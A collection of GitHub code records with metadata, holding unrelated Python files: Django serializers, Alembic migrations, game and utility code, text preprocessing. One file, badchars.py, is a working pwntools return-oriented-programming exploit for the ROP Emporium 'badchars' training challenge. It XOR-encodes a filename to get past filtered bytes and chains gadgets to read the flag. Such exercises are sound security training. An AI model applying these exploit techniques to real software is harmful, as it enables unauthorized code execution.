'r') as src:\n input_kmp = src.readlines()\n\noutput_kmp = []\nfor line in input_kmp:\n output_kmp.append(re.sub(r'\"type\": \\'(.)\\'', replace_key, line))\n\nwith open(output_kmp_path, 'w') as dest:\n dest.writelines(output_kmp)\n\n\n ","repo_name":"b-init/keyboard_layout_switching_utils","sub_path":"blender_keymap_translator/bkmp_translator.py","file_name":"bkmp_translator.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38443235248","text":"from core.models import Product, Order, Review\nfrom rest_framework import serializers\n\n\nclass ProductSerializer(serializers.HyperlinkedModelSerializer):\n product_id = serializers.ReadOnlyField(source='pk')\n\n class Meta:\n model = Product\n\n\nclass ProductListSerializer(ProductSerializer):\n\n class Meta:\n model = Product\n fields = ('product_id', 'name', 'url')\n\n\nclass OrderSerializer(serializers.HyperlinkedModelSerializer):\n order_id = serializers.ReadOnlyField(source='pk')\n\n class Meta:\n model = Order\n\n\nclass OrderListSerializer(OrderSerializer):\n\n class Meta:\n model = Order\n fields = ('order_id', 'url')\n\n\nclass OrderPostSerializer(serializers.ModelSerializer):\n \"\"\"\n Use this serializer for POST as there is a requirement with the hyperlinked modelserializer to pass the full URL\n rather than the product id.\n \"\"\"\n class Meta:\n model = Order\n\n\nclass ReviewSerializer(serializers.HyperlinkedModelSerializer):\n review_id = serializers.ReadOnlyField(source='pk')\n\n class Meta:\n model = Review\n\n\nclass ReviewListSerializer(ReviewSerializer):\n\n class Meta:\n model = Review\n fields = ('review_id', 'url')\n\n\nclass ReviewPostSerializer(serializers.ModelSerializer):\n \"\"\"\n Use this serializer for POST as there is a requirement with the hyperlinked modelserializer to pass the full URL\n rather than the product id.\n \"\"\"\n class Meta:\n model = Review\n\n\n\n\n\n","repo_name":"tabdon/django-react-shop-full","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"5850630342","text":"from MzingaShared.Core.EnumUtils import piece_names, EnumUtils\nfrom MzingaShared.Core import Position\n\n\nclass PiecePositionBase(object):\n __slots__ = \"position\", \"colour\", \"bug_type\", \"_piece_name\"\n\n def __init__(self):\n self.position = None\n self.colour = None\n self.bug_type = None\n self._piece_name = \"INVALID\"\n\n @property\n def piece_name(self):\n return self._piece_name\n\n @piece_name.setter\n def piece_name(self, value):\n self._piece_name = value\n\n if value != \"INVALID\":\n self.colour = EnumUtils.get_colour(value)\n self.bug_type = EnumUtils.get_bug_type(value)\n\n def parse(self, piece_string):\n if not self.try_parse(piece_string):\n raise ValueError(\"Unable to parse \\\"%s\\\".\" % piece_string)\n\n def try_parse(self, piece_string):\n if not piece_string or piece_string.isspace():\n raise ValueError(\"Invalid piece_string\")\n\n piece_string = piece_string.strip()\n\n try:\n sep = piece_string.find('[')\n name_string = piece_string[0:sep:]\n position_string = (piece_string[sep::]).replace('[', '').replace(']', '')\n self._piece_name = EnumUtils.parse_short_name(name_string)\n self.position = Position.parse(position_string)\n return True\n except ValueError:\n self._piece_name = \"INVALID\"\n self.position = None\n return False\n\n def __repr__(self):\n pos = self.position if self.position else \"\"\n return \"%s[%s]\" % (EnumUtils.get_short_name(self.piece_name), str(pos))\n","repo_name":"TylerGillson/mzinga-py-port","sub_path":"HiveOnline/MzingaShared/Core/PiecePositionBase.py","file_name":"PiecePositionBase.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"18753788254","text":"\"\"\"add columns mime type and lenngth for table file_content\n\nRevision ID: b0e256071ca3\nRevises: 014ea98c7b53\nCreate Date: 2023-09-04 14:42:46.980056\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b0e256071ca3'\ndown_revision = '014ea98c7b53'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('file_content', schema=None) as batch_op:\n batch_op.add_column(sa.Column('file_mime_type', sa.String(), nullable=True))\n batch_op.add_column(sa.Column('file_content_length', sa.Integer(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('file_content', schema=None) as batch_op:\n batch_op.drop_column('file_content_length')\n batch_op.drop_column('file_mime_type')\n\n # ### end Alembic commands ###\n","repo_name":"mpaczes/python-tool-kit","sub_path":"flask_web_development_framework/car-owners-project/migrations/versions/b0e256071ca3_add_columns_mime_type_and_lenngth_for_.py","file_name":"b0e256071ca3_add_columns_mime_type_and_lenngth_for_.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27492352780","text":"import heapq\n\nheap = []\nheapq.heappush(heap, (1, 'one'))\nheapq.heappush(heap, (10, 'ten'))\nheapq.heappush(heap, (5,'five'))\n\nfor x in heap:\n\tprint(x)\n\nheapq.heappop(heap)\n\nfor x in heap:\n\tprint(x)\n\n# the smallest\nprint(heap[0])\n\n\nheap = [(1, 'one'), (10, 'ten'), (5,'five')]\nheapq.heapify(heap)\nfor x in heap:\n print(x)\n\nheap[1] = (9, 'nine')\nfor x in heap:\n print(x)\n\n\n\nimport heapq\n\n# initializing list 1\nli1 = [5, 7, 9, 4, 3]\n\n# initializing list 2\nli2 = [5, 7, 9, 4, 3]\n\n# using heapify() to convert list into heap\nheapq.heapify(li1)\nheapq.heapify(li2)\n\n# using heappushpop() to push and pop items simultaneously\n# pops 2\nprint(\"The popped item using heappushpop() is : \", end=\"\")\nprint(heapq.heappushpop(li1, 2))\n\n# using heapreplace() to push and pop items simultaneously\n# pops 3\nprint(\"The popped item using heapreplace() is : \", end=\"\")\nprint(heapq.heapreplace(li2, 2))\n\nli1 = [6, 7, 9, 4, 3, 5, 8, 10, 1]\n\n# using heapify() to convert list into heap\nheapq.heapify(li1)\n\n# using nlargest to print 3 largest numbers\n# prints 10, 9 and 8\nprint(\"The 3 largest numbers in list are : \", end=\"\")\nprint(heapq.nlargest(3, li1))\n\n# using nsmallest to print 3 smallest numbers\n# prints 1, 3 and 4\nprint(\"The 3 smallest numbers in list are : \", end=\"\")\nprint(heapq.nsmallest(3, li1))","repo_name":"Pkpallaw16/Data-Structure-And-Algorithms","sub_path":"16 Priority Queue/Heapq_functions.py","file_name":"Heapq_functions.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8184339909","text":"import scipy.io\r\nfrom torch.utils.data import Dataset,DataLoader\r\nfrom torchvision import transforms\r\nimport h5py\r\nimport numpy as np\r\nimport cv2\r\nfrom PIL import Image\r\ndef zscorenorm(aaa):\r\n bb = np.mean(aaa)\r\n cc = aaa.std()\r\n aaa = (aaa - bb)/cc\r\n return aaa\r\n# '''\r\n# load数据\r\na=h5py.File('../newmachine2_1_10800_70.mat','r')#,'r'\r\nqwe = [a[element[0]][:] for element in a['djg']]\r\n\r\na2=h5py.File('../newmachine_1_10800_70.mat','r')\r\nqwe2 = [a2[element[0]][:] for element in a2['djg']]\r\n\r\na3=scipy.io.loadmat('../newmachine_1_3077_70.mat')['djg']\r\nqwe3 = []\r\nfor i in range(3077):\r\n for j in range(1):\r\n qwe3.append(a3[j][i].T)\r\ndel qwe3[2559-1]\r\ndel qwe3[1505-1]\r\ndel qwe3[1502-1]\r\ndel qwe3[1492-1]\r\ndel qwe3[1491-1]\r\ndel qwe3[1487-1]\r\ndel qwe3[1485-1]\r\ndel qwe3[1483-1]\r\ndel qwe3[1482-1]\r\ndel qwe3[1481-1]\r\ndel qwe3[1480-1]\r\ndel qwe3[1476-1]\r\ndel qwe3[544-1]\r\ndel qwe3[525-1]\r\ndel qwe3[524-1]\r\ndel qwe3[493-1]\r\ndel qwe3[481-1]\r\ndel qwe3[455-1]\r\ndel qwe3[454-1]\r\n\r\na4=h5py.File('../newmachine34_1_6000_70.mat','r')\r\nqwe4 = [a4[element[0]][:] for element in a4['djg']]\r\n\r\na5=h5py.File('../newmachine_1_15000_70.mat','r')\r\nqwe5 = [a5[element[0]][:] for element in a5['djg']]\r\n\r\na6=h5py.File('../newmachine_30_360_70_rand6.mat','r')\r\ndb = []\r\nqwe6 = []\r\nfor i in range(30):\r\n da = [a6[element[i]][:] for element in a6['djg']]\r\n db.append(da)\r\nfor i in range(360):\r\n for j in range(30):\r\n qwe6.append(db[j][i])\r\n\r\na7=h5py.File('../newmachine_1_5400_70.mat','r')\r\nqwe7 = [a7[element[0]][:] for element in a7['djg']]\r\n\r\nval_a=h5py.File('../newmachine_30_360_70_rand5.mat','r') #,'r'\r\nval_db = []\r\nval_qwe = []\r\nfor i in range(30):\r\n val_da = [val_a[element[i]][:] for element in val_a['djg']]\r\n val_db.append(val_da)\r\nfor i in range(360):\r\n for j in range(30):\r\n val_qwe.append(val_db[j][i])\r\n\r\nb=scipy.io.loadmat('../newmachine2_1_10800_true.mat')['djg3']\r\ntwe = []\r\nfor i in range(10800):\r\n for j in range(1):\r\n twe.append(b[j][i])\r\n\r\nb2=scipy.io.loadmat('../newmachine_1_10800_true.mat')['djg3']\r\ntwe2 = []\r\nfor i in range(10800):\r\n for j in range(1):\r\n twe2.append(b2[j][i])\r\n\r\nb3=scipy.io.loadmat('../newmachine_1_3077_true.mat')['djg3']\r\ntwe3 = []\r\nfor i in range(3077):\r\n for j in range(1):\r\n twe3.append(b3[j][i])\r\ndel twe3[2559-1]\r\ndel twe3[1505-1]\r\ndel twe3[1502-1]\r\ndel twe3[1492-1]\r\ndel twe3[1491-1]\r\ndel twe3[1487-1]\r\ndel twe3[1485-1]\r\ndel twe3[1483-1]\r\ndel twe3[1482-1]\r\ndel twe3[1481-1]\r\ndel twe3[1480-1]\r\ndel twe3[1476-1]\r\ndel twe3[544-1]\r\ndel twe3[525-1]\r\ndel twe3[524-1]\r\ndel twe3[493-1]\r\ndel twe3[481-1]\r\ndel twe3[455-1]\r\ndel twe3[454-1]\r\n\r\nb4=scipy.io.loadmat('../newmachine34_1_6000_true.mat')['djg3']\r\ntwe4 = []\r\nfor i in range(6000):\r\n for j in range(1):\r\n twe4.append(b4[j][i])\r\n\r\nb5=scipy.io.loadmat('../newmachine_1_15000_true.mat')['djg3']\r\ntwe5 = []\r\nfor i in range(15000):\r\n for j in range(1):\r\n twe5.append(b5[j][i])\r\n\r\nb6=scipy.io.loadmat('../newmachine_30_360_true_rand6.mat')['djg3']\r\ntwe6 = []\r\nfor i in range(360):\r\n for j in range(30):\r\n twe6.append(b6[j][i])\r\n\r\nb7=scipy.io.loadmat('../newmachine_1_5400_true.mat')['djg3']\r\ntwe7 = []\r\nfor i in range(5400):\r\n for j in range(1):\r\n twe7.append(b7[j][i])\r\n\r\nval_b=scipy.io.loadmat('../newmachine_30_360_true_rand5.mat')['djg3']\r\nval_twe = []\r\nfor i in range(360):\r\n for j in range(30):\r\n val_twe.append(val_b[j][i])\r\n# '''\r\n\r\nclass MyDataset(Dataset):\r\n def __init__(self,data,target,transform=None,transform_target=None):\r\n self.data=data\r\n # self.data_f = data_f\r\n self.target=target\r\n self.transform=transform\r\n self.transform_target = transform_target\r\n def __getitem__(self,index):\r\n data=self.data[index]\r\n data=data.astype(np.float32)\r\n data=Image.fromarray(data)\r\n if self.transform is not None:\r\n data=self.transform(data)\r\n data=np.array(data)\r\n data=data.reshape(1,512,128)\r\n\r\n # data_f = self.data_f[index]\r\n # data_f = data_f.astype(np.float32)\r\n # data_f = Image.fromarray(data_f)\r\n # if self.transform is not None:\r\n # data_f = self.transform(data_f)\r\n # data_f = np.array(data_f)\r\n # data_f = data_f.reshape(1, 512, 128)\r\n\r\n target=self.target[index]\r\n target=target.astype(np.float32)\r\n target=Image.fromarray(target)\r\n if self.transform_target is not None:\r\n target=self.transform_target(target)\r\n target=np.array(target)\r\n target=target.reshape(1,128,128)\r\n\r\n return data,target\r\n def __len__(self):\r\n return len(self.data)\r\n\r\ntransform=transforms.Compose([\r\n # transforms.RandomVerticalFlip(p=1),\r\n transforms.RandomHorizontalFlip(p=1),\r\n # transforms.ToTensor(),\r\n])\r\ntransform_target=transforms.Compose([\r\n transforms.RandomRotation(degrees=(90,90)),\r\n transforms.RandomHorizontalFlip(p=1),\r\n # transforms.ToTensor()\r\n])\r\nimport scipy.signal as signal\r\ndef stft_pic(img):\r\n for i in range(128):\r\n begin = np.zeros(shape=(257,128*3))\r\n aaa = signal.stft(img[:,i],nperseg=512,nfft=512)\r\n begin[:,i:i+3] = aaa[2]\r\n begin = cv2.resize(begin,(128,512),interpolation=cv2.INTER_NEAREST)\r\n return begin\r\n\r\nimport random\r\ndata_ori = qwe + qwe2 + qwe3 + qwe4 + qwe5 + qwe6 + qwe7 + val_qwe\r\ntarget_ori = twe + twe2 + twe3 + twe4 + twe5 + twe6 + twe7 + val_twe\r\n# f = h5py.File('../dataset.h5', 'w')\r\n# f.create_dataset('data', data=data_ori)\r\n# f.create_dataset('target', data=target_ori)\r\n# f.close()\r\n# 打乱1次\r\nrandnum = random.randint(0,100)\r\nrandom.seed(randnum)\r\nrandom.shuffle(data_ori)\r\nrandom.seed(randnum)\r\nrandom.shuffle(target_ori)\r\n# 打乱1次\r\ncc = list(zip(data_ori, target_ori))\r\nrandom.shuffle(cc)\r\ndata_ori[:], target_ori[:] = zip(*cc)\r\n\r\nf = h5py.File('../dataset_shuttle.h5', 'w')\r\nf.create_dataset('data', data=data_ori)\r\nf.create_dataset('target', data=target_ori)\r\nf.close()\r\n\r\ndata_debug = data_ori[0:10000]\r\ntarget_debug = target_ori[0:10000]\r\nf = h5py.File('../dataset_debug.h5', 'w')\r\nf.create_dataset('data', data=data_debug)\r\nf.create_dataset('target', data=target_debug)\r\nf.close()\r\n\r\n'''\r\nqwe50 = data_ori[0:58126]#72677-19=72658 *0.8 = 58126\r\nprint(len(qwe50))\r\nline=[]\r\nfor i in range(129,385):\r\n line.append(i)\r\ndata=[]\r\n# data_f = []\r\nfor i in range(58126):\r\n aa_ori = np.array(qwe50[i])\r\n # aa = aa[line,:]\r\n # aa += np.random.normal(0, 0.1, (256, 128))#addnoise\r\n # aa=cv2.resize(aa,(128,128),interpolation=cv2.INTER_NEAREST) #\r\n # aa = stft_pic(aa_ori)\r\n # new = zscorenorm(aa)\r\n # data_f.append(new)\r\n\r\n new = zscorenorm(aa_ori)\r\n data.append(new)\r\n\r\ntwe50 = target_ori[0:58126]\r\ntarget=[]\r\nfor i in range(58126):\r\n bb=np.array(twe50[i].T)\r\n bb=cv2.resize(bb,(128,128),interpolation=cv2.INTER_NEAREST) #\r\n bbnew = zscorenorm(bb)\r\n target.append(bbnew)\r\n\r\nval_qwe = data_ori[58126:72658]\r\nprint(len(val_qwe))\r\nval_data = []\r\nfor i in range(14532):\r\n aa_ori = np.array(val_qwe[i])\r\n # aa = aa[line, :]\r\n # aa += np.random.normal(0, 0.1, (256, 128))\r\n # aa=cv2.resize(aa,(128,128),interpolation=cv2.INTER_NEAREST) #\r\n # aa = stft_pic(aa_ori)\r\n # new = zscorenorm(aa)\r\n # val_data_f.append(new)\r\n\r\n new = zscorenorm(aa_ori)\r\n val_data.append(new)\r\n\r\nval_twe = target_ori[58126:72658]\r\nval_target = []\r\nfor i in range(14532):\r\n bb=np.array(val_twe[i].T) #\r\n bb=cv2.resize(bb,(128,128),interpolation=cv2.INTER_NEAREST) #\r\n bbnew = zscorenorm(bb)\r\n val_target.append(bbnew)\r\n\r\n#使用dataloader处理dataset\r\ntrain_data=MyDataset(data,target,transform=None,transform_target=None)\r\nvalid_data=MyDataset(val_data,val_target,transform=None,transform_target=None)\r\n# train_data2=MyDataset(data,target,transform=transform,transform_target=transform_target)\r\n# valid_data2=MyDataset(val_data,val_target,transform=transform,transform_target=transform_target)\r\nBATCH_SIZE=32\r\ntrain_loader=DataLoader(train_data,BATCH_SIZE,True)\r\nvalid_loader=DataLoader(valid_data,BATCH_SIZE,True)\r\n# train_loader=DataLoader(train_data + train_data2,BATCH_SIZE,True)\r\n# valid_loader=DataLoader(valid_data + valid_data2,BATCH_SIZE,True)\r\n# '''\r\n","repo_name":"ddyss/Res-Unet","sub_path":"my_code_for_PAT/dataloader_shuffle.py","file_name":"dataloader_shuffle.py","file_ext":"py","file_size_in_byte":8245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34979680012","text":"\"\"\"empty message\n\nRevision ID: 3153bc18bc7\nRevises: c12eaccb31\nCreate Date: 2015-03-05 05:41:00.937352\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '3153bc18bc7'\ndown_revision = 'c12eaccb31'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('side_catalog_attributes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('entiny_type_id', sa.Integer(), nullable=True),\n sa.Column('attribute_code', sa.String(), nullable=True),\n sa.Column('frontend_label', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('side_catalog_properties',\n sa.Column('value_id', sa.Integer(), nullable=False),\n sa.Column('option_id', sa.Integer(), nullable=True),\n sa.Column('value', sa.String(), nullable=True),\n sa.Column('attribute_id', sa.Integer(), nullable=True),\n sa.Column('attribute_code', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('value_id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('side_catalog_properties')\n op.drop_table('side_catalog_attributes')\n ### end Alembic commands ###\n","repo_name":"silago/hairy-octo-dubstep-ked-back","sub_path":"migrations/versions/3153bc18bc7_.py","file_name":"3153bc18bc7_.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29562124856","text":"from pwn import *\n\nbinary = context.binary = ELF(\"./badchars\", checksec=False)\np = process(binary.path)\n\n\n\ndef convertASCII_to_Hex(value):\n res = \"\"\n for i in value:\n res += hex(ord(i))[2:]\n return res\n\ndef changeEndian(value):\n length = len(value)\n res = \"0x\"\n for i in range(length-1, 0, -2):\n res += value[i-1]+ value[i]\n return res\n\ndef generateString(value):\n return int(changeEndian(convertASCII_to_Hex(value)), 16)\n\ndef xorByTwo(value):\n res = \"\"\n for i in value:\n res += chr(int(convertASCII_to_Hex(i), 16) ^ 2)\n return res\n\nflag = p64(generateString(xorByTwo(\"flag.txt\"))) # will convert flag.txt to a useable format to write to memory & xor the bad bytes\n\n\npadding = b\"\\x90\"*40 # inital overwrite for RSP\npop_r12_r13_r14_r15 = p64(0x40069c) # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret\npop_r14_r15 = p64(0x4006a0) # pop r14 ; pop r15 ; ret\nwriteable = 0x601337 # writeable segment in memory within .bss\nxor_gadget = p64(0x400628) # xor byte ptr [r15], r14b ; ret\npop_rdi = p64(0x04006a3) # pop rdi; ret\nprint_file = p64(0x00400510) # addr of print_file@plt\nwrite_gadget = p64(0x0400634) # mov qword ptr [r13], r12 ; ret\n\n\n# write flag into memory\npayload = padding\npayload += pop_r12_r13_r14_r15\npayload += flag + p64(writeable) + p64(1337) + p64(1337) # 1337's junk for the r14 and r15 registers\npayload += write_gadget\n\nfor index in range(8):\n payload += pop_r14_r15\n payload += p64(2) + p64(writeable + index) # 2 is our key for xor we also give it the writeable segment in memory and\n # add the index location or our range: [0,1,2,3,4,5,6,7], \"decrypting\" our flag in memory we need to do this because xor is a cheap method of encryption\n payload += xor_gadget # xor each index in r15 by the values within r14\n\n# feed the memory location of our flag to the print_file() function\npayload += pop_rdi # pop rdi; ret\npayload += p64(writeable) # writeable segment within memory at .bss segment\npayload += print_file # print_file() location\n\nlog.info(f\"flag.txt after being changed by xoring: {flag}\")\n\np.clean()\np.sendline(payload)\nprint(p.recvuntil(b\"ROPE{a_placeholder_32byte_flag!}\"))\np.close()\n","repo_name":"pwnpope/ROPemporium","sub_path":"badchars.py","file_name":"badchars.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"2046612642","text":"from abc import ABCMeta, abstractmethod\nfrom math import isnan\n\nfrom cymbology.exceptions import (\n IdError, NullError, LengthError,\n InvalidCharacterError, CheckDigitError, CheckSumError\n)\n\n\nclass SecurityId(metaclass=ABCMeta):\n \"\"\"A financial security id that can be validated.\n\n Attributes\n ----------\n MIN_LEN : int\n minimum length of security id with check digit.\n MAX_LEN : int\n maximum length of security id with check digit.\n\n Notes\n -----\n \"sid\" input variable name implies security id with check digit appended.\n \"sid_\" input variable name implies security id w/o check digit.\n \"\"\"\n\n MIN_LEN = 1\n MAX_LEN = None\n\n def validate(self, sid):\n \"\"\"validate security id string.\n\n returns sid if is validate, else raises an IdError exception.\n \"\"\"\n\n null_check(sid)\n check_sum = self.calculate_checksum(sid[:-1])\n check_digit = val_check_digit(sid)\n\n if check_sum == check_digit:\n return sid\n else:\n message = 'The check sum, {}, does not equal the check digit {}'\n\n raise CheckSumError(message.format(check_sum, check_digit))\n\n def is_valid(self, sid):\n \"\"\"True if sid is valid security id string, else False.\"\"\"\n\n try:\n return bool(self.validate(sid))\n except IdError:\n return False\n\n def calculate_checksum(self, sid_):\n \"\"\"calculate the check digit.\"\"\"\n\n self._id_check(sid_, offset=1)\n\n try:\n return self._calculate_checksum(sid_)\n except KeyError:\n raise InvalidCharacterError(\n '{} identifier contains invalid characters'.format(\n self.__class__.__qualname__\n )\n )\n\n @abstractmethod\n def _calculate_checksum(self, sid_):\n NotImplementedError\n\n def append_checksum(self, sid_):\n \"\"\"calculate and append check sum digit to security id.\"\"\"\n\n sid_ += str(self.calculate_checksum(sid_))\n return sid_\n\n def __str__(self):\n return \"<cymbology %s>\" % self.__class__.__name__\n\n def _id_check(self, sid_, offset=0):\n\n null_check(sid_)\n\n if not (self.MIN_LEN - offset) <= len(sid_) <= (self.MAX_LEN - offset):\n raise LengthError(\n length_error_message(\n self.__class__.__qualname__, self.MIN_LEN, self.MAX_LEN\n )\n )\n\n self._additional_checks(sid_)\n\n def _additional_checks(self, sid_):\n pass\n\n\ndef null_check(sid):\n \"\"\"Check if id string is null.\"\"\"\n\n if not sid or (isinstance(sid, float) and isnan(sid)):\n raise NullError\n\n\ndef val_check_digit(sid):\n \"\"\"checks if check digit can convert to integer.\"\"\"\n\n try:\n return int(sid[-1])\n except ValueError:\n raise CheckDigitError(\n \"The identifier's check digit must be an integer.\"\n )\n\n\ndef length_error_message(identifier, min_length=None, max_length=None):\n \"\"\"Build length error message.\"\"\"\n\n additional = []\n\n if min_length:\n additional.append('at least length {}'.format(min_length))\n\n if max_length:\n additional.append('at most length {}'.format(max_length))\n\n body = ', '.join(additional)\n message = '{} identifier input must {}.'.format(identifier, body)\n\n return message\n","repo_name":"pmart123/cymbology","sub_path":"cymbology/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"7292817415","text":"# If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there \n# are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n# If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, \n# how many letters would be used?\n# NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-two) \n# contains 23 letters and 115 (one hundred and fifteen) contains 20 letters. The use of \"and\" when writing out numbers is in compliance with British usage.\n# Result: 21124\n\nimport math\nfrom typing import Set, List, Tuple, Dict\nfrom functools import reduce\nimport time\nimport sys\nsys.path.append(\".\")\nfrom util import prime_factors, triangle_number\n\n\ndictionary = {\n 0: 0,\n 1: 3,\n 2: 3,\n 3: 5,\n 4: 4,\n 5: 4,\n 6: 3,\n 7: 5,\n 8: 5,\n 9: 4,\n 10: 3,\n 11: 6,\n 12: 6,\n 13: 8,\n 14: 8,\n 15: 7,\n 16: 7,\n 17: 9, \n 18: 8, \n 19: 8, \n 20: 6,\n 30: 6,\n 40: 5,\n 50: 5,\n 60: 5,\n 70: 7,\n 80: 6,\n 90: 6,\n 1000: 11\n}\n\nhundred = 7\nan = 3\n\ndef letter_count_all_through(n: int) -> int:\n return sum([ letter_count(d) for d in range(n + 1) ])\n\ndef letter_count(n: int) -> int:\n if n in dictionary:\n return dictionary[n]\n count = 0\n last_two = n % 100\n if last_two in dictionary:\n # 0-19\n count += dictionary[last_two]\n else:\n last_one = last_two % 10\n count += dictionary[last_one]\n count += dictionary[last_two - last_one]\n n //= 100\n if n:\n count += hundred\n if last_two:\n count += an\n count += dictionary[n]\n return count\n\nif __name__ == '__main__':\n \"\"\"starts here\"\"\"\n n = 1000\n start = time.time()\n print(letter_count_all_through(n)) # 21124\n print(time.time() - start) # 0.0008 sec\n","repo_name":"etoitau/project-euler","sub_path":"017 number letter counts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73077295840","text":"import sys\n\nsys.stdin = open('input.txt')\n\ndef a(k,n):\n if k == 0 :\n return n\n elif n == 1:\n return 1\n\n return a(k-1,n)+a(k,n-1)\n\ntest = int(input())\nfor _ in range(test):\n k = int(input())\n n = int(input())\n\n\n print(a(k,n))\n","repo_name":"cmkds/algo","sub_path":"study/7_list_0814/back.2775/2775_2.py","file_name":"2775_2.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33989291895","text":"from math import *\n\nwhile 1 < 2 :\n\n\ta = int(input('enter a ==> '));\n\tb = int(input('enter b ==> '));\n\tc = int(input('enter c ==> '));\n\te = 2.7182818285;\n\tdelta = ((b**2)-4*a*c)\n\tx1 = ((-1*b+sqrt(delta))/(2*a))\n\tx2 = ((-1*b-sqrt(delta))/(2*a))\n\tx0 = ((-1*b)/(2*a))\n\n\tprint('∆ = b²-4ac = ',b,'² - 4 ×',a,'×',c,'=' ,delta);\n\tif delta > 0 :\n\t\tq_1 = str(input('do u want to see the solutions (yes/no) => '))\n\t\tif q_1 == 'yes' :\n\t\t\tprint('x1 = ', x1)\n\t\t\tprint('x2 = ', x2)\n\t\tif q_1 == 'no' :\n\t\t\tprint('okay...')\n\tif delta == 0 :\n\t\tq_2 = str(input('do u want to see the solutions (yes/no) => '))\n\t\tif q_2 == 'yes' :\n\t\t\tprint('x0 = ', x0)\n\t\tif q_2 == 'no' :\n\t\t\tprint('okay...')\n\tif delta < 0 :\n\t\tprint('there is no solution')\n","repo_name":"phenix1001/Delta","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20090104994","text":"# -*- coding:UTF-8 -*-\nimport os\nimport re\n\n\ndef strQ2B(ustring):\n '''全角转半角'''\n rstring = ''\n for uchar in ustring:\n inside_code = ord(uchar)\n if inside_code == 12288: # 全角空格直接转换\n inside_code = 32\n elif (inside_code >= 65281 and inside_code <= 65374): # 全角字符(除空格)根据关系转化\n inside_code -= 65248\n rstring += chr(inside_code)\n return rstring\n\n\ndef escape(text):\n '''html转义'''\n text = (text.replace(\""\", \"\\\"\").replace(\"“\", \"“\").replace(\"”\", \"”\")\n .replace(\"·\", \"·\").replace(\"’\", \"’\").replace(\"“\", \"“\")\n .replace(\"”\", \"\\”\").replace(\"—\", \"——\").replace(\"…\", \"…\")\n .replace(\"•\", \"·\").replace(\"(\", \"(\").replace(\")\", \")\")\n .replace(\"·\", \"·\").replace(\"&\", \"&\").replace(\"•\", \"·\")\n .replace(\"<\", \"<\").replace(\"<\", \"<\").replace(\">\", \">\")\n .replace(\">\", \">\").replace(\" \", \" \").replace(\" \", \" \")\n .replace(\"˜\", \"~\").replace(\"—\", \"—\").replace(\"©\", \"@\")\n .replace(\"©\", \"@\").replace(\"♂\", \"\").replace(\"\\r\\n|\\r\", \"\\n\").replace(' ', ' '))\n return text\n\n\ndef read_sogou_report():\n base = 'Reduced/'\n types = os.listdir(base)\n sentences = []\n count = 0\n index = 0\n for type in types:\n # type = 'C000008'\n docs = os.listdir(base + type)\n for doc in docs:\n file = None\n try:\n file = open(base + type + '/' + doc, 'r', encoding='gbk')\n content = escape(strQ2B(file.read())).replace(r'\\s', '').replace(r'\\n\\d+\\n', '')\n lines = re.split(r'\\n', re.sub(r'[ \\t\\f]+', r'', content))\n for line in lines:\n sentences.extend(line.split('。'))\n # break\n file.close()\n except UnicodeDecodeError as e:\n count += 1\n file.close()\n # sentences.append(content)\n\n return sentences\n\ndef estimate_cws(current_labels,correct_labels):\n cor_dict = {}\n curt_dict = {}\n curt_start = 0\n cor_start = 0\n for label_index,(curt_label,cor_label) in enumerate(zip(current_labels,correct_labels)):\n if cor_label == 0:\n cor_dict[label_index] = label_index + 1\n elif cor_label == 1:\n cor_start = label_index\n elif cor_label == 3:\n cor_dict[cor_start] = label_index + 1\n\n if curt_label == 0:\n curt_dict[label_index] = label_index + 1\n elif curt_label == 1:\n curt_start = label_index\n elif curt_label == 3:\n curt_dict[curt_start] = label_index + 1\n\n cor_count = 0\n recall_length = len(curt_dict)\n prec_length = len(cor_dict)\n for curt_start in curt_dict.keys():\n if curt_start in cor_dict and 